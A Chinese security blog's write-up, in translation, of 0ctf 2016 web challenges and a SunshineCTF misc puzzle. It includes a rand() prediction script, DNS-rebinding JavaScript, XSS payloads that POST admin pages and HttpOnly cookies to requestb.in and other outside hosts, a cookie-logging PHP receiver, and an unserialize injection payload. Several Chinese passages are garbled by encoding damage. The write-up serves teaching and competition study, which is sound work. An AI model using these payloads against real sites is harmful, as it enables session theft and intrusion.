LoRexxar's Blog

0ctf2016 && sunshinectf2016 writeup

2016/03/14

Last weekend I played the rather brutal 0ctf. The upshot, in the words of the "academic faction": every problem reads like a research paper... This web dog got thoroughly crushed, so I'm also appending the sunshine ctf misc300 writeup (a competition with no web problems at all Orz).

0ctf2016

rand2

This problem was solved by a teammate and I don't fully understand it; you have to predict the random numbers (and hit the md5) within 1 minute.
First, two other people's writeups:
http://www.isecer.com/ctf/0ctf_2016_web_writeup_rand_2.html
https://github.com/p4-team/ctf/tree/master/2016-03-12-0ctf/rand_2

First, the challenge source:

<?php
include('config.php');
session_start();
if($_SESSION['time'] && time() - $_SESSION['time'] > 60) {
    session_destroy();
    die('timeout');
} else {
    $_SESSION['time'] = time();
}
echo rand();
if (isset($_GET['go'])) {
    $_SESSION['rand'] = array();
    $i = 5;
    $d = '';
    while($i--){
        $r = (string)rand();
        $_SESSION['rand'][] = $r;
        $d .= $r;
    }
    echo md5($d);
} else if (isset($_GET['check'])) {
    if ($_GET['check'] === $_SESSION['rand']) {
        echo $flag;
    } else {
        echo 'die';
        session_destroy();
    }
} else {
    show_source(__FILE__);
}

Under Keep-Alive the random numbers can be predicted (the connection stays on the same PHP worker, so every request draws from the same seeded generator).
http://drops.hduisa.cn/archives/365/

Prediction method:
state[i] = state[i-3] + state[i-31]
return state[i] >> 1

And the paper:
https://media.blackhat.com/bh-us-12/Briefings/Argyros/BH_US_12_Argyros_PRNG_WP.pdf
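The recurrence above is enough to play the whole rand2 flow offline. The block below is an added example (not from the original post or the challenge authors): it models glibc's random() generator, which PHP's rand() used on Linux at the time (this transcription of glibc's algorithm, the `glibc_random_outputs` helper and the seed range are assumptions of the example), observes 32 outputs plus the md5 of the next five exactly as `?go=` prints them, and recovers those five with no knowledge of the seed. The only uncertainty per output is the carry bit from the two low bits that `>> 1` discards, so five outputs cost at most 2^5 md5 comparisons. The defender's lesson is the same one the challenge teaches: rand()/mt_rand() are not secrets; use random_int()/random_bytes().

```python
import hashlib
from itertools import product

MASK31 = 0x7fffffff
MASK32 = 0xffffffff


def glibc_random_outputs(seed, count):
    """Model of glibc random() (TYPE_3): additive lagged Fibonacci
    r[i] = r[i-3] + r[i-31] mod 2^32, output r[i] >> 1, first 310 outputs
    discarded.  Assumption: this mirrors glibc; seed limited to 1..2^31-1."""
    if not 1 <= seed <= MASK31:
        raise ValueError("seed must be in 1..2^31-1 for this model")
    r = [0] * (344 + count)
    r[0] = seed
    for i in range(1, 31):
        r[i] = (16807 * r[i - 1]) % 2147483647   # Park-Miller LCG fills the state
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344 + count):
        r[i] = (r[i - 3] + r[i - 31]) & MASK32
    return [x >> 1 for x in r[344:]]


def next_candidates(outputs):
    """Given >= 31 consecutive outputs, the two possible values of the next.
    o[i] = ((o[i-3] + o[i-31]) mod 2^31) + c with c in {0, 1}: c is the carry
    out of the two discarded low bits, and nothing else is unknown."""
    i = len(outputs)
    base = (outputs[i - 3] + outputs[i - 31]) & MASK31
    return base, (base + 1) & MASK31


def recover_from_md5(observed, digest, n=5):
    """Enumerate the 2^n carry choices for the next n outputs and return the
    sequence whose concatenation (the challenge hashes $d = r1.r2...r5)
    matches digest, or None if nothing matches."""
    for carries in product((0, 1), repeat=n):
        seq = list(observed)
        for c in carries:
            seq.append(next_candidates(seq)[c])
        guess = seq[len(observed):]
        joined = "".join(str(v) for v in guess)
        if hashlib.md5(joined.encode()).hexdigest() == digest:
            return guess
    return None


def simulate_challenge(seed):
    """Offline rand2: watch 31 outputs plus the one ?go= prints, take the md5
    it prints for the next five, recover those five without the seed."""
    stream = glibc_random_outputs(seed, 32 + 5)
    observed, secret = stream[:32], stream[32:]
    digest = hashlib.md5("".join(map(str, secret)).encode()).hexdigest()
    return recover_from_md5(observed, digest) == secret


if __name__ == "__main__":
    print(simulate_challenge(20160314))  # constructed seed; the attacker never learns it
```

The 32 candidate sequences are tried in carry order, so the match is found well inside the 60-second session window the challenge allows; a CSPRNG has no such recurrence, which is what makes the `?go=` md5 useless to an observer.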

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
import re
import hashlib
import time
from itertools import product

cookie = {"PHPSESSID": "2okdf7k5e637e1fms75t0a1hg4"}
heade = {"Connection": "Keep-Alive"}   # stay on the same PHP worker, hence the same rand() state
#url = "http://127.0.0.1/test.php"
url = "http://202.120.7.202:8888"
url2 = "http://202.120.7.202:8888/?go="
session = requests.session()

def test():
    # collect 31 consecutive rand() outputs; the show_source() branch prints rand() right before <code>
    ran_num = []
    for i in range(31):
        req = session.get(url, cookies=cookie, headers=heade)
        cont = req.text
        try:
            num = re.findall(r'(.+)<code>', cont)[0]
        except IndexError:
            print(i)
            return None
        ran_num.append(int(num))
    # ?go= prints one more rand() followed by md5() of the next five: "<digits><32 hex chars>"
    req = session.get(url2, cookies=cookie, headers=heade)
    cont = req.text.strip()
    m = re.match(r'(\d+)([0-9a-f]{32})$', cont)   # the original sliced cont[1:-32] / cont[-32:-1] here
    ran_num.append(int(m.group(1)))
    md5_num = m.group(2)
    #print(md5_num)

    def cand(s):
        # next output = (sum of the two earlier outputs mod 2^31) plus a carry of 0 or 1 from the
        # low bits that >> 1 discards; the original dropped the top bit of bin(s) instead, which
        # is only right when the sum exceeds 2^31
        base = s & 0x7fffffff
        return [str(base), str((base + 1) & 0x7fffffff)]

    # outputs 32..34 depend only on observed values: r[i] = r[i-3] + r[i-31]
    go_num = []
    for x in range(3):
        y = 32 + x
        go_num.append(cand(ran_num[y-3] + ran_num[y-31]))
    # outputs 35 and 36 depend on the guessed outputs 32 and 33, so four candidates each
    for x in range(2):
        e = x + 4
        add_list = []
        for y in range(2):
            add_list += cand(int(go_num[x][y]) + ran_num[e])
        go_num.append(add_list)
    print(go_num)
    # for x in range(5):
    #     req = session.get(url, cookies=cookie, headers=heade)
    #     cont = req.text
    #     num = re.findall(r'(.+)<code>', cont)[0]
    #     print(num)
    # try every combination against the md5 the server printed
    for a, b, c, d, e in product(*go_num):
        now_num = a + b + c + d + e
        now_md5 = hashlib.md5(now_num.encode()).hexdigest()
        if md5_num == now_md5:
            print("yes")
            return [a, b, c, d, e]
    # x = 32
    # now_num = ""
    # for i in range(5):
    #     y = x + i
    #     num1 = ran_num[y - 3] + ran_num[y - 31]
    #     bin_num = bin(num1)
    #     #if len(bin_num) >= 32:
    #     #    num2 = num1
    #     #else:
    #     num2 = int(bin_num[0:2] + bin_num[3:], 2)
    #     #now_num += str(num)
    #     req = session.get(url, cookies=cookie, headers=heade)
    #     cont = req.text
    #     num3 = re.findall(r'(.+)<code>', cont)[0]
    #     ran_num.append(int(num3))
    #     #print(num3, "===>", num2)
    #     print(num3, "===>", num1, " and ", num2)
    return None

def suc(num5):
    # submit the five predicted values as check[]; PHP compares the array against $_SESSION['rand'] with ===
    url3 = "http://202.120.7.202:8888/?"
    for x in num5:
        url3 += "check[]=" + str(x) + "&"
    req = session.get(url3, cookies=cookie, headers=heade)
    print(req.text)
    #print(now_md5)
    #print(md5_num)

if __name__ == '__main__':
    res = test()
    # while not res:
    #     try:
    #         res = test()
    #     except Exception:
    #         res = False
    #         print("yyy")
    #     time.sleep(1)
    if res:
        suc(res)

My teammate told me the slicing was wrong, so no flag came out, OrZ....

Monkey (bypassing the same-origin policy)

棣栧厛鏄竴涓猰d5纰版挒锛屾湰浠ヤ负寰堥夯鐑︼紝鍚庢潵鍙戠幇鍏跺疄灏辨槸鐩稿綋浜庨獙璇佺爜绫讳技鐨勪笢瑗裤

import hashlib

n = 10000                        # renamed from the original `str`, which shadowed the builtin
while 1:
    m2 = hashlib.md5()
    m2.update(repr(n).encode())  # the server hashes the decimal text of the number
    if (m2.hexdigest()[0:6] == 'bfb93d'):
        print(n)
        break
    n += 1

Then I tried reading things through <img> and <iframe>, but because of the same-origin policy nothing could be read.
I read other people's writeups:

http://www.isecer.com/ctf/0ctf_2016_web_writeup_monkey.html
https://w00tsec.blogspot.jp/2016/03/0ctf-2016-write-up-monkey-web-4.html

It turns out this works through some mysterious means: first use ajax for a CORS cross-origin request, then point the domain's DNS at 127.0.0.1 (remember to serve on port 8080), and while the bot has the page open and is waiting, the domain re-resolves and that's it (a DNS rebinding attack) Orz (mom asks why I'm typing on my knees).
The server script looks something like this

<script src="jquery.min.js"></script>
<script>
function getdata(){
    $.ajax({
        type: "GET",
        url:'http://xxx.com:8080/secret',
        async: true,
        error: function(request) {
            getdata();   // keep retrying until the DNS answer has flipped to 127.0.0.1
        },
        success: function(data) {
            $.get('http://yourdomain/get.php?data='+data);
        }
    });
}
getdata();
</script>

guestbook1 (bypass xss filter)

I was completely stuck on this problem; it takes two pieces of black magic to get past the checks, and reproducing it took a long time. Mainly I read this blog post
http://security.szurek.pl/0ctf-2016-guestbook-1-writeup.html

The most impressive part is that the author almost reconstructed the challenge source by guesswork; worth a try if you're interested.
A bit of testing shows that <>'" are filtered, that the username is placed in two places (the id and the content), and that text goes through a debug check:

<body>
<div><h3>to be checked</h3></div>
<script>var debug=false;</script>
<div id="dsadsa">
    <h2>dsadsa</h2>
</div>
<div id="text">dsadsa</div>
<script>
data = "dsadsa"
t = document.getElementById("text")
if(debug){
    t.innerHTML=data
}else{
    t.innerText=data
}
</script>
</body>

There is a hint that the boss uses chrome. I initially took chrome to be just the normal environment, but a piece of black magic is used here.
About the chrome XSS auditor:
Before rendering the response in the Document Object Model presented to the user, XSS auditor searches for instances of (malicious) parameters sent in the original request. If a detection is positive, the auditor is triggered and the response is "rewritten" to a non-executable state in the browser DOM.

鎴栬浣犺嫳鏂囦笉濂斤紝鎴戜篃鏄湅鐨勫崐鐭ュ崐瑙o紝涓婇潰杩欒瘽鐨勬剰鎬濆氨鏄痗hrome浼氭娴嬩綘鐨勮姹傦紝濡傛灉鏈夌被浼间簬<script>var debug=false</script>杩欐牱鐨勮姹傦紝chrome浼氭妸杩欎釜鍒濆鍖栧拷瑙嗘帀锛屾垜浠笉浠呴渶瑕佸拷瑙嗚繖涓彉閲忥紝杩橀渶瑕佸垵濮嬪寲涓涓嬶紝杩欓噷灏遍渶瑕乽sername杩欓噷浼氭妸浼犲叆鐨勫兼斁鍏d鐨勯棶棰樹簡銆

We need to construct <div id="debug">. As for why constructing an id is enough to initialize debug, that is also rather magical.

http://stackoverflow.com/questions/3434278/do-dom-tree-elements-with-ids-become-global-variables

I didn't fully understand it, but roughly: debug becomes a global that is initialized to the element object, which is truthy, so the innerHTML branch runs Orz.

With the earlier problems solved, the next step is constructing the DOM XSS request.

payload = 'xmlhttp=new XMLHttpRequest();xmlhttp.open("GET","http://requestb.in/xxxx",false);xmlhttp.send();'
out = []
for s in payload:
    out.append(str(ord(s)))
# \x3c and \u0022 are JS string escapes for < and "; they are decoded when data = "..." is parsed,
# so the literal characters never reach the filter
print("\\x3cimg src=a onerror=\\u0022eval(String.fromCharCode(" + ", ".join(out) + "))\\u0022\\x3e")

Since single and double quotes are filtered, we have to use eval+String.fromCharCode to get the request through.

Secret:
random_characters_must_be_unique<script>var debug=false;</script>
Username:
debug
Message:
\x3cimg src=a onerror=\u0022eval(String.fromCharCode(120, 109, 108, 104, 116, 116, 112, 61, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 41, 59, 120, 109, 108, 104, 116, 116, 112, 46, 111, 112, 101, 110, 40, 34, 71, 69, 84, 34, 44, 34, 104, 116, 116, 112, 58, 47, 47, 114, 101, 113, 117, 101, 115, 116, 98, 46, 105, 110, 47, 120, 120, 120, 120, 34, 44, 102, 97, 108, 115, 101, 41, 59, 120, 109, 108, 104, 116, 116, 112, 46, 115, 101, 110, 100, 40, 41, 59))\u0022\x3e

Note that \ gets escaped here, so you have to pass \\ for a single \ to come through.
First write a script to generate the message (borrowed a friend's; it posts directly):

#!/bin/env python
#-*- encoding: utf-8 -*-
import requests
import random
import string

def post(s, u, m):
    r = requests.session()
    if len(u) < 1:
        u = 'debug'
    _data = {
        "secret": s,
        "username": u,
        "message": m,
        "action": "submit"
    }
    res = r.post("http://202.120.7.201:8888/message.php", data=_data)
    return res.url

def rstr(n=10):
    # random prefix so the secret is unique for every post
    # (the original used string.join, which inserts spaces it then had to strip)
    return ''.join(random.sample(string.ascii_lowercase, n))

def m2s(m):
    r = ''
    for x in m:
        r += ',' + str(x)
    return r[1:]

if __name__ == '__main__':
    s = '<script>var debug=false;</script>'
    payload = 'xmlhttp=new XMLHttpRequest();xmlhttp.open("GET","/admin/show.php",false);xmlhttp.send();r=xmlhttp.responseText;xmlhttp.responseText;xmlhttp.open("POST","http://xss.lazysheep.cc",false);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("vv="+escape(r));'
    l = m2s(map(ord, payload))
    # doubled backslashes: the server escapes one level, so \\x3c arrives in the page as \x3c
    p2 = '\\\\x3cimg src=a onerror=\\\\u0022eval(String.fromCharCode(' + l + '))\\\\u0022\\\\x3e'
    print(post(rstr() + s, 'debug', p2))

Got some stuff back:

<html>
<!-- change log:
use http-only cookie to prevent cookie stealing by xss, so flag is safe in cookie
always check /admin/server_info.php for load balancing
to do:
files and folders permission control, disallow other users write file into uploads folder -->
<body>
<script>var debug=false;</script>
<div id="">
<h2></h2>
</div>
<div id="text"></div>
<script>
data = ""
t = document.getElementById("text")
if(debug){
t.innerHTML=data
}else{
t.innerText=data
}
</script>
</body>
</html>

It tells us to check /admin/server_info.php. Opening it shows phpinfo().

Because the cookie is HttpOnly, JS cannot read it, but it is always sent with the request, and phpinfo() prints the request's cookies.

payload = 'xmlhttp=new XMLHttpRequest();xmlhttp.open("GET","/admin/server_info.php",false);xmlhttp.send();r=xmlhttp.responseText;xmlhttp.responseText;xmlhttp.open("POST","http://requestb.in/xxxx",false);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("vv="+escape(r));'

This way we get his phpinfo():

<td class="e">_COOKIE["flag"]</td><td class="v">0ctf{httponly_sometimes_not_so_secure}</td></tr>
<tr><td class="e">_COOKIE["admin"]</td><td class="v">salt_is_admin</td></tr>

For some reason I couldn't reproduce this last step; a friend gave me his PHP receiver

<?php
$data = "get : ".urldecode(urldecode($_SERVER['QUERY_STRING']));
$data .= "\r\npost : ".urldecode(urldecode(file_get_contents("php://input")));
$data .= "\r\nip : ".$_SERVER["REMOTE_ADDR"];
$data .= "\r\nREFERER : ".$_SERVER['HTTP_REFERER'];
$data .= "\r\nHTTP_USER_AGENT : ".$_SERVER['HTTP_USER_AGENT'];
$data .= "\r\nREQUEST_METHOD : ".$_SERVER['REQUEST_METHOD'];
$data .= "\r\nCookies : ".implode(' ',$_COOKIE);   // the original had $_COOKIES, which is not a PHP superglobal
if(strlen($data)>10){
    // H:i:s rather than H:m:s ('m' is the month)
    file_put_contents("get.txt","### ".date("Y-m-d H:i:s")." ###\r\n".$data."\r\n", FILE_APPEND);
}
exit();
?>

The data lands in get.txt; open it and you've got it...

piapiapia (PHP unserialize string-length escape)

First, someone else's writeup
http://www.isecer.com/ctf/0ctf_2016_web_writeup_piapiapia.html

I'm too lazy to upload the source; ask me if you want it. Reading through it, the problem probably lies in serialization; first look at the filter

public function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);
    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}

鎰熻闂鍦╱pdate.php涓

$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);

One flawed check is the nickname check

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
    die('Invalid nickname');

A bit of research shows that if an array is passed in, both checks pass (neither preg_match nor strlen handles an array)

With normal input, the serialized string is normal:

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:17:"email@email.email";s:8:"nickname";a:1:{i:0;s:3:"xxx";}s:5:"photo";s:39:"upload/0cc175b9c0f1b6a831c399e269772661";}

Serialization uses strict lengths; if a length is wrong, unserialize errors out and stops.
We need to try constructing nickname[]=xxx";}s:5:"photo";s:10:"config.php so that, if it spills out of the string, we can read config.php.

There's one thing I couldn't figure out until I read the writeup: the filter's where->hacker replacement grows the string by one character per match, so if you pass in as many 'where's as the length of the part you need to push out, a complete payload overflows out of the declared string and unserialize doesn't error.

nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php

get!
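To make the length desynchronisation concrete, here is an added example (not from the original post or the challenge) in Python: a strict, minimal PHP serialize()/unserialize() for the i/s/a types, the challenge's filter() transcribed, and the two storage orders side by side. `vulnerable_store` serializes and then filters, as update.php does; `hardened_store` filters each field and only then serializes, so the s:N: prefixes are computed on the final bytes. `build_nickname` pads with exactly one 'where' per character of the injected tail, which is the general form of the 31-where payload above. The array-bypass of the nickname check is not modelled; only the serialization step is.

```python
import re

# Constructed model of the challenge's flow: serialize() first, filter() after.
# where -> hacker adds one character per match but the s:N: prefix is not
# updated, so the trailing N-th..last characters of the field fall outside
# the string and are parsed as new fields.  ASCII data is assumed.


class PhpUnserializeError(ValueError):
    pass


def php_serialize(v):
    """PHP serialize() for int, str, list (0-indexed array) and dict."""
    if isinstance(v, int):
        return "i:%d;" % v
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v.encode()), v)
    if isinstance(v, list):
        v = dict(enumerate(v))
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return "a:%d:{%s}" % (len(v), body)
    raise TypeError("unsupported type %r" % type(v))


def _parse(d, p):
    t = d[p]
    if t == "i":
        end = d.index(";", p)
        return int(d[p + 2:end]), end + 1
    if t == "s":
        colon = d.index(":", p + 2)
        n = int(d[p + 2:colon])
        start = colon + 2                       # skip :"
        s = d[start:start + n]                  # exactly n chars, whatever they contain
        if d[start + n:start + n + 2] != '";':  # wrong length => hard error, as in PHP
            raise PhpUnserializeError("bad string terminator at %d" % (start + n))
        return s, start + n + 2
    if t == "a":
        colon = d.index(":", p + 2)
        n = int(d[p + 2:colon])
        p = colon + 2                           # skip :{
        out = {}
        for _ in range(n):
            k, p = _parse(d, p)
            out[k], p = _parse(d, p)
        if d[p] != "}":
            raise PhpUnserializeError("missing } at %d" % p)
        return out, p + 1
    raise PhpUnserializeError("unknown type %r at %d" % (t, p))


def php_unserialize(d):
    """Like PHP unserialize(): parse one value and ignore whatever trails it."""
    value, _ = _parse(d, 0)
    return value


def php_filter(s):
    """The challenge's filter(): ' and \\ become _, SQL keywords become hacker."""
    s = re.sub(r"'|\\", "_", s)
    return re.sub(r"select|insert|update|delete|where", "hacker", s, flags=re.I)


def vulnerable_store(profile):
    return php_filter(php_serialize(profile))       # challenge order: serialize, then filter


def hardened_store(profile):
    clean = {k: [php_filter(x) for x in v] if isinstance(v, list) else php_filter(v)
             for k, v in profile.items()}
    return php_serialize(clean)                     # lengths computed after filtering


def build_nickname(injected_photo):
    """Nickname array element whose tail is pushed out of the string."""
    tail = '";}s:5:"photo";s:%d:"%s' % (len(injected_photo), injected_photo)
    return ["where" * len(tail) + tail]             # one extra char per where == len(tail)


PHOTO = "upload/0cc175b9c0f1b6a831c399e269772661"   # value from the writeup's normal record


def profile_with(nickname):
    return {"phone": "12345678901", "email": "email@email.email",
            "nickname": nickname, "photo": PHOTO}


def stored_photo(store, nickname):
    """What the profile's photo field reads back as after a round trip."""
    return php_unserialize(store(profile_with(nickname)))["photo"]
```

Calling `stored_photo(vulnerable_store, build_nickname("config.php"))` reads back "config.php" while `stored_photo(hardened_store, ...)` keeps the upload path: the padded nickname is still stored, but its s:N: now covers the whole post-filter value, so the injected tail is data rather than structure. Filtering after serialization (or any other length-changing rewrite of serialized data) is the root cause, not the unserialize call itself.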

guestbook2

The writeup isn't out yet; placeholder for now.

total 100
drwxr-xr-x 22 root root 4096 Mar 9 14:53 .
drwxr-xr-x 22 root root 4096 Mar 9 14:53 ..
drwxr-xr-x 2 root root 4096 Mar 7 14:25 bin
drwxr-xr-x 3 root root 4096 Mar 7 14:26 boot
drwxr-xr-x 15 root root 4100 Mar 13 13:11 dev
drwxr-xr-x 96 root root 4096 Mar 13 13:20 etc
-r--r----- 1 flag flag 29 Mar 9 13:59 flag
-r-sr-x--- 1 flag www-data 8709 Mar 9 14:52 flag_reader
drwxr-xr-x 5 root root 4096 Mar 9 13:59 home
lrwxrwxrwx 1 root root 32 Mar 7 14:26 initrd.img -> boot/initrd.img-4.2.0-30-generic
lrwxrwxrwx 1 root root 32 Mar 7 22:07 initrd.img.old -> boot/initrd.img-4.2.0-27-generic
drwxr-xr-x 21 root root 4096 Mar 9 00:17 lib
drwxr-xr-x 2 root root 4096 Mar 7 22:07 lib64
drwx------ 2 root root 16384 Mar 7 22:07 lost+found
drwxr-xr-x 3 root root 4096 Mar 7 22:07 media
drwxr-xr-x 2 root root 4096 Apr 11 2014 mnt
drwxr-xr-x 2 root root 4096 Feb 18 07:12 opt
dr-xr-xr-x 129 root root 0 Mar 13 13:11 proc
drwx------ 10 root root 4096 Mar 14 07:03 root
drwxr-xr-x 19 root root 720 Mar 14 22:22 run
drwxr-xr-x 2 root root 4096 Mar 7 14:25 sbin
drwxr-xr-x 2 root root 4096 Feb 18 07:12 srv
dr-xr-xr-x 13 root root 0 Mar 13 14:29 sys
drwxrwxrwt 2 root root 4096 Mar 15 13:09 tmp
drwxr-xr-x 10 root root 4096 Mar 7 22:07 usr
drwxr-xr-x 13 root root 4096 Mar 8 23:24 var
lrwxrwxrwx 1 root root 29 Mar 7 14:26 vmlinuz -> boot/vmlinuz-4.2.0-30-generic
lrwxrwxrwx 1 root root 29 Mar 7 22:07 vmlinuz.old -> boot/vmlinuz-4.2.0-27-generic

Found flag, but it can't be read; there is a flag_reader (setuid to flag, executable by www-data), so just run it.

Its privileges are fairly high; let's look around elsewhere

total 20
drwxr-xr-x 5 root root 4096 Mar 9 13:59 .
drwxr-xr-x 22 root root 4096 Mar 9 14:53 ..
drwxr-xr-x 2 flag flag 4096 Mar 9 13:59 flag
drwxrwx--- 2 root guestbook 4096 Mar 14 06:29 guestbook
drwxr-xr-x 3 ops ops 4096 Mar 7 14:36 ops

Nothing in guestbook; let's look at the current directory

total 36
drwxr-xr-x 5 root root 4096 Mar 13 14:02 .
drwxr-xr-x 3 root root 4096 Mar 8 23:23 ..
drw-r-x--- 2 root www-data 4096 Mar 13 14:16 admin
-rw-r-x--- 1 root www-data 193 Mar 6 00:58 config.php
-rw-r-x--- 1 root www-data 1578 Mar 10 11:05 index.php
-rw-r-x--- 1 root www-data 684 Feb 27 23:11 message.php
-rw-r-x--- 1 root www-data 1077 Mar 9 23:03 show.php
drw-r-x--- 2 root www-data 4096 Mar 6 01:12 static
drwx-wx-wx 3 root www-data 4096 Mar 15 13:25 uploads

sunshine ctf2016

鎰熻鎸烘湁鎰忔濈殑涓涓瘮璧涳紝鏄經缃楅噷杈惧ぇ瀛︿妇鍔炵殑ctf锛屾墍鏈夌殑棰樼洰涓嶆槸misc灏辨槸pwn锛屾劅瑙夋瘮杈冨潙锛屼絾鏄敱浜庡ぇ閮ㄥ垎棰樼洰姣旇緝鍩虹锛屾尯鏈夋剰鎬濈殑锛屽挨鍏舵槸鍋氫簡涓閬撴瘮杈冩湁鎰忔濈殑misc棰樼洰銆

Floridaman found this cool new invite only internet relay chat service but he can't figure out how to actually get an invite... since you're not a part of the Florida education system, maybe you can figure it out. http://4.31.182.246:4567

The problem statement says Floridaman wants into a chat room but doesn't know how to get an invite. Opening the site, there is a place to enter a freenode channel and password, so enter one; joining the channel on freenode, a stranger comes in and says

You prove yourself by typing !flag ...; a bit of testing shows that after you type something, someone PMs you how many characters you are still off. At first I thought it was a prefix-match kind of thing, but it turned out not to be.

Fuzzing first shows it wants 12 characters, among them the characters Flagrsd810. Then, after a full hour of testing, it turns out that the characters allowed after each character differ: only F can be followed by any of the characters other than itself, and 8 must come last. Having found some patterns, time to test...

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests

# session values copied from the browser's webchat.freenode.net session at the time
cookie = {"__cfduid": "d489d3a9976cf50fa718050f32c4607201457848341", "PAH": "alpha3"}
url = "https://webchat.freenode.net/dynamic/alpha/e/p?r=ea69282e77352a34d3696d90247dbc17&t=827"
a = "Flagrsd810"
#a = "OPQRSTUVWXYZ"
for x in a:
    # try every candidate second character after the leading F; the bot's PM says how far off we are
    cont = "PRIVMSG #ddog :!flag F" + x
    data = {"s": "d3542650d359032fe7deecf5f4479e5d", "c": cont}
    req = requests.post(url, data=data, cookies=cookie)

After repeated testing I worked out the order to put the 10 letters in, except that there are still 2 repeated ones; another round of fuzzing

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests

cookie = {"__cfduid": "d489d3a9976cf50fa718050f32c4607201457848341", "PAH": "alpha3"}
url = "https://webchat.freenode.net/dynamic/alpha/e/p?r=ea69282e77352a34d3696d90247dbc17&t=827"
# final 12-character ordering found by fuzzing; the original kept the for-loop from the
# previous script around this line, which only sent the same message ten times
cont = "PRIVMSG #ddog :!flag Fl0rdda1sgr8"
data = {"s": "d3542650d359032fe7deecf5f4479e5d", "c": cont}
req = requests.post(url, data=data, cookies=cookie)

And it turned out to be "Florida"... mdzz... that's a cultural difference for you.....
